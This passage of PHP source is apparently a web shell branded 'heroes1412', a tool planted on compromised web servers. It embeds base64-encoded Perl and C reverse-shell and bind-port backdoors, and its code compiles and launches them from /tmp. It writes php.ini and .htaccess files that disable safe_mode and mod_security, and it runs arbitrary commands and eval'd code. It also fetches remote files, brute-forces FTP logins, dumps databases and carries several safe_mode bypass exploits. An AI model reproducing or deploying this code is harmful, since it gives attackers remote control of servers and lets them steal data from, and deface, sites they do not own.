Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
lIENPTk47DQpleGl0IDA7DQp9DQp9";
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
$php_ini1="c2FmZV9tb2RlICAgICAgICAgICAgICAgPSAgICAgICBPZmY=";
$htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+";
$sni_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsic3MiXSk7DQo/Pg==";
if($unix)
{
if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
if($safe_mode) { $sysctl = '-'; }
else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
else
{
$sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
if(empty($sysctl)) { $sysctl = '-'; }
setcookie('sysctl',$sysctl);
}
}
if(!isset($_COOKIE[$lang[$language.'_text129']])) {
$ust_u='';
if($unix && !$safe_mode){
foreach ($userful as $item) {
if(which($item)){$ust_u.=$item;}
}
}
if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$ust_u.=", mod_perl";}
if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$ust_u.=", mod_include(SSI)";}
if (@function_exists('pcntl_exec')) {$ust_u.=", pcntl_exec";}
if (@extension_loaded('win32std')) {$ust_u.=", win32std_loaded";}
if (@extension_loaded('win32service')) {$ust_u.=", win32service_loaded";}
if (@extension_loaded('ffi')) {$ust_u.=", ffi_loaded";}
if (@extension_loaded('perl')) {$ust_u.=", perl_loaded";}
if(substr($ust_u,0,1)==",") {$ust_u[0]="";}
$ust_u = trim($ust_u);
}
else
{
$ust_u = trim($_COOKIE[$lang[$language.'_text129']]);
}
if(!isset($_COOKIE[$lang[$language.'_text130']])) {
$select_downloaders='';
if(substr($downloader,0,1)==",") {$downloader[0]="";}
$downloader=trim($downloader);
}else {
$select_downloaders = $_COOKIE['select_downloaders'];
$downloader = trim($_COOKIE['downloader']);
}
echo $head;
echo '';
if(empty($_POST['cmd'])) {
$serv = array(127,192,172,10);
$addr=@explode('.', $_SERVER['SERVER_ADDR']);
$current_version = str_replace('.','',$version);
}
echo '| '.ws(3).ws(3).'o--[ heroes1412 ]--o | ';
echo ws(2)."".date ("d-m-Y H:i:s")."";
echo ws(2).$lb." phpinfo ".$rb;
echo ws(2).$lb." php.ini ".$rb;
if($unix)
{
echo ws(2).$lb." cpu ".$rb;
echo ws(2).$lb." mem ".$rb;
echo ws(2).$lb." users ".$rb;
echo ws(2).$lb." brute ".$rb;
echo ws(2).$lb." ln -s all ".$rb;
}
echo ws(2).$lb." tmp ".$rb;
echo ws(2).$lb." deface vbb ".$rb."
";
echo ws(2)."safe_mode: ";
echo (($safe_mode)?("ON"):("OFF"));
echo "".ws(2);
echo "Open_Basedir: ";
if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "ini_get disable!";}else {echo "$df";};}
else {echo "NONE";}
echo ws(2)."Safe_Exec_Dir: ";
if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "NONE";}else {echo "$df";};}
else {echo "ini_get disable!";}
echo ws(2)."Safe_Gid: ";
if(@function_exists('ini_get')) { if (@ini_get('safe_mode_gid')) {echo "ON";}else {echo "OFF";};}
else {echo "ini_get disable!";}
echo ws(2)."Safe_Include_Dir: ";
if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "NONE";}else {echo "$df";};}
else {echo "ini_get disable!";}
echo ws(2)."Sql.safe_mode: ";
if(@function_exists('ini_get')) { if (@ini_get('sql.safe_mode')) {echo "ON";}else {echo "OFF";};}
else {echo "ini_get disable!";}
echo "
".ws(2);
echo "PHP version: ".@phpversion()."";
$curl_on = @function_exists('curl_version');
echo ws(2);
echo "cURL: ".(($curl_on)?("ON"):("OFF"));
echo "".ws(2);
echo "MySQL: ";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "ON"; } else { echo "OFF"; }
echo "".ws(2);
echo "MSSQL: ";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "ON";}else{echo "OFF";}
echo "".ws(2);
echo "PostgreSQL: ";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "ON";}else{echo "OFF";}
echo "".ws(2);
echo "Oracle: ";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "ON";}else{echo "OFF";}
echo "
".ws(2);
echo "Disable functions : ";
if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if($ust_u){echo "
".ws(2).$lang[$language.'_text129'].": ".$ust_u."";};
if($downloader){echo "
".ws(2).$lang[$language.'_text130'].": ".$downloader."";};
if (!$all) {$all = 0;}
echo "
".ws(2)."Free space : ".view_size($free)." Total space: ".view_size($all)."";
echo "
".ws(2);
echo "Server IP: [ ".gethostbyname($_SERVER["HTTP_HOST"])." ]";
echo " -- Your IP: [ ".gethostbyname($_SERVER["REMOTE_ADDR"])." ]";
echo ' |
';
echo $font;
if($unix){
echo 'uname -a :'.ws(1).'
sysctl :'.ws(1).'
$OSTYPE :'.ws(1).'
Server :'.ws(1).'
id :'.ws(1).'
pwd :'.ws(1).'
';
echo ' | ';
echo "";
echo((!empty($uname))?(ws(3).@substr($uname,0,120)."
"):(ws(3).@substr(@php_uname(),0,120)."
"));
echo ws(3).$sysctl."
";
echo ws(3).ex('echo $OSTYPE')."
";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
";
if(!empty($id)) { echo ws(3).$id."
"; }
else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
{
$euserinfo = @posix_getpwuid(@posix_geteuid());
$egroupinfo = @posix_getgrgid(@posix_getegid());
echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )
';
}
else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."
";
echo ws(3).$dir;
echo ws(3).'( '.perms(@fileperms($dir)).' )';
echo "";
}
else
{
echo 'Opera System :'.ws(1).'
Server :'.ws(1).'
User :'.ws(1).'
pwd :'.ws(1).'
';
echo ' | ';
echo "";
echo ws(3).@substr(@php_uname(),0,120)."
";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
";
echo ws(3).@getenv("USERNAME")."
";
echo ws(3).$dir;
echo "
";
}
echo "";
echo " | ";
$f = '
';
if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
{
$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
{
switch($_POST['what'])
{
case 'own':
@chown($_POST['param1'],$_POST['param2']);
break;
case 'grp':
@chgrp($_POST['param1'],$_POST['param2']);
break;
case 'mod':
@chmod($_POST['param1'],intval($_POST['param2'], 8));
break;
}
$_POST['cmd']="";
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
{
switch($_POST['what'])
{
case 'file':
if($_POST['action'] == "create")
{
if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
else {
fclose($file);
$_POST['e_name'] = $_POST['mk_name'];
$_POST['cmd']="edit_file";
echo "".$lang[$language.'_text61']." |
";
}
}
else if($_POST['action'] == "delete")
{
if(unlink($_POST['mk_name'])) echo "".$lang[$language.'_text63']." |
";
$_POST['cmd']="";
}
break;
case 'dir':
if($_POST['action'] == "create"){
if(mkdir($_POST['mk_name']))
{
$_POST['cmd']="";
echo "".$lang[$language.'_text62']." |
";
}
else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
}
else if($_POST['action'] == "delete"){
if(rmdir($_POST['mk_name'])) echo "".$lang[$language.'_text64']." |
";
$_POST['cmd']="";
}
break;
}
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
{
if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
else {
echo $table_up3;
echo $font;
echo "";
echo " ";
exit();
}
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
{
$mtime = @filemtime($_POST['e_name']);
if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
else {
if($unix) $_POST['e_text']=@str_replace("
","
",$_POST['e_text']);
@fwrite($file,$_POST['e_text']);
@touch($_POST['e_name'],$mtime,$mtime);
$_POST['cmd']="";
echo "".$lang[$language.'_text45']." |
";
}
}
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
{
cf("/tmp/bd.c",$port_bind_bd_c);
$blah = ex("gcc -o /tmp/bd /tmp/bd.c");
@unlink("/tmp/bd.c");
$blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
$_POST['cmd']="ps -aux | grep bd";
}
if (!empty($_POST['php_ini1']))
{
cf("php.ini",$php_ini1);
$_POST['cmd']=" Da write xong php.ini thu? thu? coi di";
}
if (!empty($_POST['htacces']))
{
cf(".htaccess",$htacces);
$_POST['cmd']="Da write xong htaccess thu? thu? coi di ";
}
if (!empty($_POST['file_ini']))
{
cf("ini.php",$sni_res);
$_POST['cmd']="Try again :D";
}
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
{
cf("/tmp/bdpl",$port_bind_bd_pl);
$p2=which("perl");
$blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
$_POST['cmd']="ps -aux | grep bdpl";
}
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
{
cf("/tmp/back",$back_connect);
$p2=which("perl");
$blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
}
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
{
cf("/tmp/back.c",$back_connect_c);
$blah = ex("gcc -o /tmp/backc /tmp/back.c");
@unlink("/tmp/back.c");
$blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
}
if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
for($upl=0;$upl<=4;$upl++)
{
if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){
if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; }
else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; }
@move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
or print("Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']." ");
}
}
if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
{
switch($_POST['with'])
{
case wget:
$_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
break;
case fetch:
$_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
break;
case lynx:
$_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case links:
$_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case GET:
$_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case curl:
$_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
break;
}
}
if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
{
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
if(empty($ftp_port)) { $ftp_port = 21; }
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
if(!$connection) { err(3); }
else
{
if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
else
{
if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); }
if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); }
}
}
@ftp_close($connection);
$_POST['cmd'] = "";
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
{
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
if(empty($ftp_port)) { $ftp_port = 21; }
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
if(!$connection) { err(3); $_POST['cmd'] = ""; }
else if(!$users=get_users()) { echo "".$lang[$language.'_text96']." |
"; $_POST['cmd'] = ""; }
@ftp_close($connection);
}
echo $table_up3;
if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("dir -ao"); }
else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
echo $font.$lang[$language.'_text1'].": ".$_POST['cmd']."";
}
break;
case 'copy':
if(empty($snn)){
if(empty($_GET['snn'])){
if(empty($_POST['snn'])){
} else {
$u1p=$_POST['snn'];
}
} else {
$u1p=$_GET['snn'];
}
}
$u1p=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$snn, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "".htmlspecialchars($tekst)."";
unlink($temp);
echo "";
}
break;
case 'ini_restore':
if(empty($_POST['ini_restore'])){
} else {
$ini=$_POST['ini_restore'];
echo ini_get("safe_mode");
echo ini_get("open_basedir");
require_once("$ini");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
echo "";
}
break;
case 'glob':
function reg_glob()
{
$chemin=$_REQUEST['glob'];
$files = glob("$chemin*");
foreach ($files as $filename) {
echo "$filename
";
}
}
if(isset($_REQUEST['glob']))
{
reg_glob();
}
break;
case 'zend':
if(empty($_POST['zend'])){
} else {
$dezend=$_POST['zend'];
include($_POST['zend']);
print_r($GLOBALS);
require_once("$dezend");
echo "";
}
break;
case 'plugin':
if ($_POST['plugin'] )
{
$i = 0;
while ($i < 60000) {
$line = posix_getpwuid($i);
if (!empty($line)) {
while (list ($key, $vl) = each($line)){
echo $vl."
";
break;
}
}
$i++;
}
}
break;
case 'test14':
$ioncube = @ioncube_read_file($_POST['test14_cmd']);
echo htmlspecialchars($ioncube);
break;
case 'test15':
$tmp = '';
if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
elseif(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
else break;
@unlink($tmp.'/result_test15.txt');
@win_shell_execute("cmd.exe","","/c ".$_POST['test15_cmd']." > ".$tmp."/result_test15.txt");
while(!file_exists($tmp.'/result_test15.txt')) sleep(1);
$lines = @file ($tmp.'/result_test15.txt');
if($lines) foreach ($lines as $line) { echo htmlspecialchars($line); }
@unlink($tmp.'/result_test15.txt');
break;
case 'test16':
$tmp = '';
if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
if(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
else break;
$name=$tmp."\".uniqid();
$n=uniqid();
$cmd=(empty($_SERVER['COMSPEC']))?'c:\windows\system32\cmd.exe':$_SERVER['COMSPEC'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c ".$_POST['test16_cmd']." >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name)) sleep(1);
$exec=file_get_contents($name);
unlink($name);
echo htmlspecialchars($exec);
break;
case 'test18':
if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
if(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
else break;
$name=$tmp."\".uniqid();
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c ".$_POST['test18_cmd']." >\"$name\"",0);
while(!file_exists($name)) sleep(1);
$exec=file_get_contents($name);
unlink($name);
echo htmlspecialchars($exec);
break;
case 'test19':
if(Empty($test19) aNd Empty($_GET['test19']) aNd Empty($_POST['test19'])) diE("
".$karatonik);
if(!empty($_GET['test19'])) $file=$_GET['test19'];
if(!empty($_POST['test19'])) $file=$_POST['test19'];
if((curl_exec(curl_init("file:http://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../".$file))) aNd !emptY($file)) die("
Shell by heroes1412");
elseif(!emptY($file)) die("Sorry... File ".htmlspecialchars($file)."doesn't exists or you don't have permissions");Beark;
case 'test20':
@ob_clean();
$error_reporting = @ini_get('error_reporting');
error_reporting(E_ALL ^ E_NOTICE);
@ini_set("display_errors", 1);
@ini_alter("display_errors", 1);
$str=@fopen($_POST['test20_file'],"r");
while(!feof($str)){print htmlspecialchars(fgets($str));}
fclose($str);
error_reporting($error_reporting);
break;
case 'test21':
$filen=$_POST['test21_file'];
@fopen('srpath://../../../../../../../../../../../'.$_POST['test21_file'],"a");
if (file_exists($filen))
{
echo $lang[$language.'_text61'];
}
else
echo "Can't write file";
break;
case 'test22':
echo "PHP realpath() listing directory Safe_mode bypass Exploit
";
if(!$dir){$dir='/etc/';};
if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';}
if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';}
if($realpath=realpath($dir.'/')){echo $realpath."
";}
if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."
";}
foreach($presets_rlph as $preset_rlph){
if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."
";}
}
for($i=0; $i < strlen($chars_rlph); $i++){
if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."
";}
if($n_rlph<=1){continue;};
for($j=0; $j < strlen($chars_rlph); $j++){
if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."
";}
if($n_rlph<=2){continue;};
for($x=0; $x < strlen($chars_rlph); $x++){
if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."
";}
if($n_rlph<=3){continue;};
for($y=0; $y < strlen($chars_rlph); $y++){
if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."
";}
if($n_rlph<=4){continue;};
for($z=0; $z < strlen($chars_rlph); $z++){
if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."
";}
if($n_rlph<=5){continue;};
for($w=0; $w < strlen($chars_rlph); $w++){
if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."
";}
}
}
}
}
}
}
echo "
Generation time: ".round(@getmicrotime()-starttime,4)." sec
";
break;
case 'test23':
@session_save_path($_POST['test23_file2']."�;$tempdir");
@session_start();
@$_SESSION[php]=$_POST['test23_file1'];
$filen=$_POST['test23_file2'];
if(file_exists($filen))
echo $lang[$language.'_text61']." ".$filen;
else
echo "Can't write file";
break;
case 'test24':
@putenv("TMPDIR=".$_POST['test24_file2']);
@ini_set("session.save_path", "");
@ini_alter("session.save_path", "");
@session_start();
@$_SESSION[php]=$_POST['test24_file1'];
$filen=$_POST['test24_file2'];
if(file_exists($filen))
echo $lang[$language.'_text61']." ".$filen;
else
echo "Can't write file";
break;
case 'test25':
@readfile($_POST['test25_file1'], 3, "php://../../../../../../../../../../../".$_POST['test24_file2']);
$filen=$_POST['test25_file2'];
if(file_exists($filen))
echo $lang[$language.'_text61'];
else
echo "Can't write file";
break;
case 'file1':
if(!empty($_POST['file1']))
$file1=$_POST['file1'];
$level=0;
if(!file_exists("file1:"))
mkdir("file1:");
chdir("file1:");
$level++;
$hardstyle = explode("/", $file1);
for($a=0;$aSorry... File '.htmlspecialchars($file1).' doesnt exists or you dont have permissions.');
curl_close($ch);
break;
case 'file':
if(!empty($_POST['file']))
$file=$_POST['file'];
$level=0;
if(!file_exists("file:"))
mkdir("file:");
chdir("file:");
$level++;
$hardstyle = explode("/", $file);
for($a=0;$aSorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
curl_close($ch);
break;
}
}
else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
$cmd_rep = ex($_POST['cmd']);
if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."
"; }
else { echo @htmlspecialchars($cmd_rep)."
"; }}
if ($_POST['cmd']=="heroes1412_mysql")
{
if(empty($_POST['test3_sr'])) { $_POST['test3_sr'] = "localhost"; }
if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
$db = @mysql_connect($_POST['test3_sr'].':'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
if($db)
{
if(@mysql_select_db($_POST['test3_md'],$db))
{
@mysql_query("DROP TABLE IF EXISTS heroes1412");
@mysql_query("CREATE TABLE `heroes1412` ( `file` LONGBLOB NOT NULL )");
@mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\','/',$_POST['test3_file'])."\" INTO TABLE heroes1412 FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '
'");
$r = @mysql_query("SELECT * FROM heroes1412");
while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
@mysql_query("DROP TABLE IF EXISTS heroes1412");
}
else echo "[-] ERROR! Can't select database";
@mysql_close($db);
}
else echo "[-] ERROR! Can't connect to mysql server";
}
if ($_POST['cmd']=="ftp_brute")
{
$suc = 0;
foreach($users as $user)
{
$connection = @ftp_connect($ftp_server,$ftp_port,10);
if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success
"; $suc++; }
else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success
"; $suc++; } }
@ftp_close($connection);
}
echo "
-------------------------------------
";
$count = count($users);
if(isset($_POST['reverse'])) { $count *= 2; }
echo $lang[$language.'_text97'].$count."
";
echo $lang[$language.'_text98'].$suc."
";
}
if ($_POST['cmd']=="php_eval"){
$eval = @str_replace("","",$eval);
eval($eval);}
if ($_POST['cmd']=="mysql_dump")
{
if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
else {
if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."
"; }
else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."
"); }
else { echo "[-] ERROR! Can't write in dump file"; }
}
}
echo " ";
echo "";
echo " |
";
echo "";
function div_title($title, $id)
{
return ''.$title.'';
}
function div($id)
{
if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '';
return ' ';
}
if(!$safe_mode){
echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
echo sr(15,"".$lang[$language.'_text3'].$arrow."",in('text','cmd',85,''));
echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.' '.$table_end1.$fe;
}
else{
echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
echo sr(15," ".$lang[$language.'_text4'].$arrow."",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
echo $te.' ".$fs."| ".$ts;
echo " Read File ";
